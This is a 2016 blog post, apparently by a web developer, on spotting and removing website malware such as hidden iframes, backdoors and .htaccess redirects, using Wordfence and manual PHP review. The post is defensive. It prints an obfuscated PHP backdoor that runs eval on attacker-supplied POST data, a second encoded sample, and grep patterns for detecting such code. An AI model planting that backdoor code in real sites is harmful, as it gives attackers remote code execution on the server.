Malware Prevention / Removal Techniques - Part 1 (Introduction)

Posted on - Last Modified on

While trying to access your website you end up seeing a warning from Google that you're website is probably hacked; could this be a bad day?

No, it's not. Don't let such a thing ruin it!

In this article, I will present to you some of the most common malware types and what the best tehniques are when it comes to removing, cleaning, or preventing them.

Most common types of malwares include the following:

Iframe

Also known as inline frame. This is the type of iframe code that has been injected into your website and is often zero pixel in window size. You can't see it but your web browser is loading it.

Backdoors

Backdoors are server side malicious scripts and are intended to gain malicious access to your server. Most common examples of these types of gremlins are:

  • File Managers
  • Various Web Sheels
  • Injection Scripts
  • Email SPAM Scripts
  • SEO SPAM Scripts

For example:

  1. File Manager backdoor allows attackers to access your whole hosting/server. While allowing them access, they can modify/remove/reinfect server-side files and serve infected files to your visitors.
  2. Email SPAM Scripts allows attackers to send SPAM emails directly from your server, mostly ones that promotes "Lose Weight" or "Reverse Aging" mails. Such emails may come through your server.
  3. SEO SPAM Scripts - the most malicious technique to manipulate Google results.

.htaccess malware (Conditional redirections)

Conditional redirections are generally done though the HTTP headers (via .htaccess) to redirect users from certain browsers or locations to malware/malicious locations.

Example: A user coming from a search engine (like Google) or certain user agent get redirected to a malicious domain.

Prevention / Cleaning

1. WordPress // Wordfence

For WordPress, I would suggest using a plugin called Wordfence.

This plugin can help you prevent and even clean up your infected website.

After installing plugin, head over to Options and be sure to enable/include all types of scans:

Then Save Changes and head over to Scan Process; once scanning is completed, you will have a list of issues (if any) and options to recover original files if there is a difference between file located on server and original version from plugin/theme or even WordPress core repository.

2. PHP

Most common types of PHP malwares are encrypted, encoded, or in some cases a combination. It is not always as simple as looking for encrypted code since you need to have some common knowledge of PHP and overall introduction to your hosted PHP script and CMS so you can easily detect and remove PHP code.

Sample 1:

<?php $xxf5 ="ues_tpro"; $skk16 = $xxf5[2]. $xxf5[4].$xxf5[6].$xxf5[4]. $xxf5[7].$xxf5[0]. $xxf5[5].$xxf5[5].$xxf5[1].$xxf5[6]; $fka19=$skk16 ($xxf5[3].$xxf5[5] . $xxf5[7].$xxf5[2].$xxf5[4] );if (isset( ${$fka19 } [ 'q73dce7'])){eval(${$fka19} ['q73dce7']) ;}?> 

Sample 2:

<?php $GLOBALS['j91600'] = "\x49\xd\x5d\x2d\x2f\x5b\x20\x3f\x4a\x39\x31\x7c\x4b\x35\x77\x68\x33\x7d\x60\x72\x6c\x3e\x9\x5c\x5a\x78\x24\x52\x54\x76\x41\x44\x64\x2b\x38\x2e\x40\x57\x30\x73\xa\x36\x43\x3a\x56\x4f\x7b\x70\x74\x4e\x4c\x29\x5e\x34\x6f\x37\x21\x58\x7e\x25\x69\x3b\x7a\x6b\x51\x23\x28\x63\x53\x61\x22\x55\x71\x45\x48\x59\x42\x46\x3c\x6a\x75\x5f\x62\x67\x3d\x27\x79\x26\x2a\x65\x6d\x6e\x50\x2c\x32\x4d\x47\x66";
$GLOBALS[$GLOBALS['j91600'][80].$GLOBALS['j91600'][38].$GLOBALS['j91600'][82].$GLOBALS['j91600'][9].$GLOBALS['j91600'][67].$GLOBALS['j91600'][89]] = $GLOBALS['j91600'][67].$GLOBALS['j91600'][15].$GLOBALS['j91600'][19];
$GLOBALS[$GLOBALS['j91600'][97].$GLOBALS['j91600'][89].$GLOBALS['j91600'][10].$GLOBALS['j91600'][53]] = $GLOBALS['j91600'][54].$GLOBALS['j91600'][19].$GLOBALS['j91600'][32];
$GLOBALS[$GLOBALS['j91600'][14].$GLOBALS['j91600'][53].$GLOBALS['j91600'][32].$GLOBALS['j91600'][10].$GLOBALS['j91600'][94].$GLOBALS['j91600'][10]] = $GLOBALS['j91600'][39].$GLOBALS['j91600'][48].$GLOBALS['j91600'][19].$GLOBALS['j91600'][20].$GLOBALS['j91600'][89].$GLOBALS['j91600'][91];
$GLOBALS[$GLOBALS['j91600'][15].$GLOBALS['j91600'][32].$GLOBALS['j91600'][82].$GLOBALS['j91600'][34].$GLOBALS['j91600'][16].$GLOBALS['j91600'][34]] = $GLOBALS['j91600'][60].$GLOBALS['j91600'][91].$GLOBALS['j91600']... etc.

Search all PHP files for any of the common patterns used:

  • base64_decode
  • gzinflate(base64_decode
  • eval(gzinflate(base64_decode
  • eval(base64_decode

For manual removal of infected malware code from PHP, you will need to have some basic knowledge of editing PHP code.

Most file names are the following: 

  1. login.php
  2. index.php
  3. upload.php
  4. title.php
  5. 404.php
  6. 500.php

In some cases, there are randomly generated file names like 'dsa03xf.php' as one example.

Coming soon in Part 2:

  • JavaScript Malware code
  • Online Malware Scanners
  • .htaccess malware recognition and removal
  • Email/SEO Spam scripts
  • Google malware or unwanted software review
  • IP Blacklisting scanning/removal

I hope that you found this Part 1 of Malware Prevention/Removal Techniques useful. Please stay tuned for Part 2 and if you need my help, feel free to contact me.

Posted 30 January, 2016

</> dvlpmt

Software maverick.

Creative technologist and web/software developer for more than 12 years with strong interpersonal, communicative and organizational skills. In my career, I've delivered more than 600 projects for small and large business owners. I use my creativity to build new solutions that provide strategic advantage to my clients and improve the overall experience of the end users.

Next Article

Malaysian Startup Helps Companies Build Brands Using Video